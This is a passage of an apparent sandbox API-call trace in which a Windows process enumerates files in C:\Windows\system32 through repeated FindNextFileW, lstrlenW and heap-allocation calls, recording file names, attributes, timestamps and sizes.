dwReserved0=0x0, dwReserved1=0x0, cFileName="activeds.dll", cAlternateFileName="")) returned 1 [0060.326] lstrlenW (lpString="activeds.dll") returned 12 [0060.327] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x70dee0 [0060.327] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedc36d00, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xedc36d00, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xedb524c6, ftLastWriteTime.dwHighDateTime=0x1ca0412, nFileSizeHigh=0x0, nFileSizeLow=0x1b400, dwReserved0=0x0, dwReserved1=0x0, cFileName="activeds.tlb", cAlternateFileName="")) returned 1 [0060.327] lstrlenW (lpString="activeds.tlb") returned 12 [0060.327] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a81bf79, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a81bf79, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a8420d9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4ba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="actxprxy.dll", cAlternateFileName="")) returned 1 [0060.327] lstrlenW (lpString="actxprxy.dll") returned 12 [0060.327] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x70df88 [0060.327] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x554a4ec2, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x554a4ec2, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x65268bd0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x9800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdapterTroubleshooter.exe", cAlternateFileName="")) returned 1 [0060.327] lstrlenW (lpString="AdapterTroubleshooter.exe") returned 25 [0060.327] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xb4) returned 0x70e030 [0060.327] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa343f8c0, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xa343f8c0, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7d856840, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="admparse.dll", cAlternateFileName="")) returned 1 [0060.327] lstrlenW (lpString="admparse.dll") returned 12 [0060.327] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x70e0f0 [0060.327] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c6129e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb1c6129e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1c873fe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdmTmpl.dll", cAlternateFileName="")) returned 1 [0060.328] lstrlenW (lpString="AdmTmpl.dll") returned 11 [0060.328] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x70e198 [0060.328] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2f573ca, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xe2f573ca, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dbea0b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc200, dwReserved0=0x0, dwReserved1=0x0, cFileName="adprovider.dll", cAlternateFileName="")) returned 1 [0060.328] lstrlenW (lpString="adprovider.dll") returned 14 [0060.328] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9e) returned 0x70e238 [0060.328] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b68a4f3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8b68a4f3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8b68a4f3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2da00, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsldp.dll", cAlternateFileName="")) returned 1 [0060.328] lstrlenW (lpString="adsldp.dll") returned 10 [0060.328] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x96) returned 0x70e2e0 [0060.328] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9f1b122, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xf9f1b122, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dccd180, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x31800, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsldpc.dll", cAlternateFileName="")) returned 1 [0060.328] lstrlenW (lpString="adsldpc.dll") returned 11 [0060.328] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x70e380 [0060.328] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf66b897d, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xf66b897d, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dccd180, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsmsext.dll", cAlternateFileName="")) returned 1 [0060.328] lstrlenW (lpString="adsmsext.dll") returned 12 [0060.329] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x70e420 [0060.329] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad634c2, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xfad634c2, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dcf4280, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3fa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsnt.dll", cAlternateFileName="")) returned 1 [0060.329] lstrlenW (lpString="adsnt.dll") returned 9 [0060.329] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x94) returned 0x70e4c8 [0060.329] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fc81ff4, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2fc81ff4, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf1def050, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa6200, dwReserved0=0x0, dwReserved1=0x0, cFileName="adtschema.dll", cAlternateFileName="")) returned 1 [0060.329] lstrlenW (lpString="adtschema.dll") returned 13 [0060.329] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9c) returned 0x70e568 [0060.329] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cdedaf6, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8cdedaf6, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdvancedInstallers", cAlternateFileName="ADVANC~1")) returned 1 [0060.329] lstrlenW (lpString="AdvancedInstallers") returned 18 [0060.329] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x250) returned 0x70e610 [0060.329] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\AdvancedInstallers\\*", lpFindFileData=0x70e610 | out: lpFindFileData=0x70e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cdedaf6, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8cdedaf6, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70cb48 [0060.351] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x70e610 | out: lpFindFileData=0x70e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cdedaf6, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8cdedaf6, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.351] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x70e610 | out: lpFindFileData=0x70e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8eb80ed5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8eb80ed5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8eba7035, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1d600, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmiadapter.dll", cAlternateFileName="")) returned 1 [0060.351] lstrlenW (lpString="cmiadapter.dll") returned 14 [0060.353] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc4) returned 0x70f870 [0060.353] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x70e610 | out: lpFindFileData=0x70e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x964c1054, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x964c1054, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x965595d5, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1f2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmiv2.dll", cAlternateFileName="")) returned 1 [0060.353] lstrlenW (lpString="cmiv2.dll") returned 9 [0060.353] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xba) returned 0x70f940 [0060.354] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x70e610 | out: lpFindFileData=0x70e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf919a2c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xbf919a2c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xacf3bdc0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OEMHelpIns.dll", cAlternateFileName="")) returned 1 [0060.354] lstrlenW (lpString="OEMHelpIns.dll") returned 14 [0060.354] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc4) returned 0x70fa08 [0060.354] FindNextFileW (in: hFindFile=0x70cb48, lpFindFileData=0x70e610 | out: lpFindFileData=0x70e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf919a2c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xbf919a2c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xacf3bdc0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OEMHelpIns.dll", cAlternateFileName="")) returned 0 [0060.354] FindClose (in: hFindFile=0x70cb48 | out: hFindFile=0x70cb48) returned 1 [0060.354] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70e610 | out: hHeap=0x6e0000) returned 1 [0060.354] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b0c6f80, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9b0c6f80, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9b0ed0e0, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x9c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="advapi32.dll", cAlternateFileName="")) returned 1 [0060.354] lstrlenW (lpString="advapi32.dll") returned 12 [0060.354] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x70fad8 [0060.354] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0777c0d, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xa0777c0d, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7de49f40, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="advpack.dll", cAlternateFileName="")) returned 1 [0060.354] lstrlenW (lpString="advpack.dll") returned 11 [0060.354] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x70fb80 [0060.355] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e862c71, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x5e862c71, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x7de71040, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aecache.dll", cAlternateFileName="")) returned 1 [0060.355] lstrlenW (lpString="aecache.dll") returned 11 [0060.355] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x70fc20 [0060.355] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79c6f412, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x79c6f412, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0xf1f20320, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x5a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aeevts.dll", cAlternateFileName="")) returned 1 [0060.355] lstrlenW (lpString="aeevts.dll") returned 10 [0060.355] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x96) returned 0x70fcc0 [0060.355] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2994413f, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x2994413f, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7e0609f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xb600, dwReserved0=0x0, dwReserved1=0x0, cFileName="AltTab.dll", cAlternateFileName="")) returned 1 [0060.355] lstrlenW (lpString="AltTab.dll") returned 10 [0060.355] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x96) returned 0x70fd60 [0060.355] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74a8a79f, ftCreationTime.dwHighDateTime=0x1ca03fd, ftLastAccessTime.dwLowDateTime=0x74a8a79f, ftLastAccessTime.dwHighDateTime=0x1ca03fd, ftLastWriteTime.dwLowDateTime=0x74803050, ftLastWriteTime.dwHighDateTime=0x1ca03fd, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="amcompat.tlb", cAlternateFileName="")) returned 1 [0060.355] lstrlenW (lpString="amcompat.tlb") returned 12 [0060.356] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a29ac8e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a29ac8e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a29ac8e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x0, dwReserved1=0x0, cFileName="amstream.dll", cAlternateFileName="")) returned 1 [0060.356] lstrlenW (lpString="amstream.dll") returned 12 [0060.356] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9a) returned 0x70fe00 [0060.356] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76fcd8be, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x76fcd8be, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0x7e0853e0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="amxread.dll", cAlternateFileName="")) returned 1 [0060.356] lstrlenW (lpString="amxread.dll") returned 11 [0060.356] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x98) returned 0x70fea8 [0060.356] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41bceeb, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xd41bceeb, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7e4d7330, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1a8c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apds.dll", cAlternateFileName="")) returned 1 [0060.357] lstrlenW (lpString="apds.dll") returned 8 [0060.357] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x92) returned 0x70ff48 [0060.357] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf21dc5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf21dc5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-console-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.357] lstrlenW (lpString="api-ms-win-core-console-l1-1-0.dll") returned 34 [0060.357] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc6) returned 0x70e610 [0060.358] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cefbc66, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cefbc66, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-datetime-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.358] lstrlenW (lpString="api-ms-win-core-datetime-l1-1-0.dll") returned 35 [0060.358] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc8) returned 0x70e6e0 [0060.358] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cd32bf2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cd32bf2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-debug-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.358] lstrlenW (lpString="api-ms-win-core-debug-l1-1-0.dll") returned 32 [0060.358] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2) returned 0x70e7b0 [0060.358] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cf941e2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cf941e2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-delayload-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.358] lstrlenW (lpString="api-ms-win-core-delayload-l1-1-0.dll") returned 36 [0060.358] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xca) returned 0x70e880 [0060.358] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2ccc07d5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2ccc07d5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-errorhandling-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.358] lstrlenW (lpString="api-ms-win-core-errorhandling-l1-1-0.dll") returned 40 [0060.359] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xd2) returned 0x70e958 [0060.359] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cd7eeb0, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cd7eeb0, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-fibers-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.359] lstrlenW (lpString="api-ms-win-core-fibers-l1-1-0.dll") returned 33 [0060.359] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc4) returned 0x70ea38 [0060.359] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1f57d2, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1f57d2, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l1-1-0.dll", cAlternateFileName="")) returned 1 [0060.359] lstrlenW (lpString="api-ms-win-core-file-l1-1-0.dll") returned 31 [0060.359] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc0) returned 0x70eb08 [0060.359] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8c9b158, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="")) returned 1 [0060.359] lstrlenW (lpString="api-ms-win-core-file-l1-2-0.dll") returned 31 [0060.359] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc0) returned 0x70ebd0 [0060.359] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb859c590, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb859c590, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8c9b158, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l2-1-0.dll", cAlternateFileName="")) returned 1 [0060.359] lstrlenW (lpString="api-ms-win-core-file-l2-1-0.dll") returned 31 [0060.360] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc0) returned 0x70ec98 [0060.360] FindNextFileW (in: hFindFile=0x70b900, lpFindFileData=0x70b6a8 | out: lpFindFileData=0x70b6a8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2cfe04a0, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2cfe04a0, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25ab000, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, 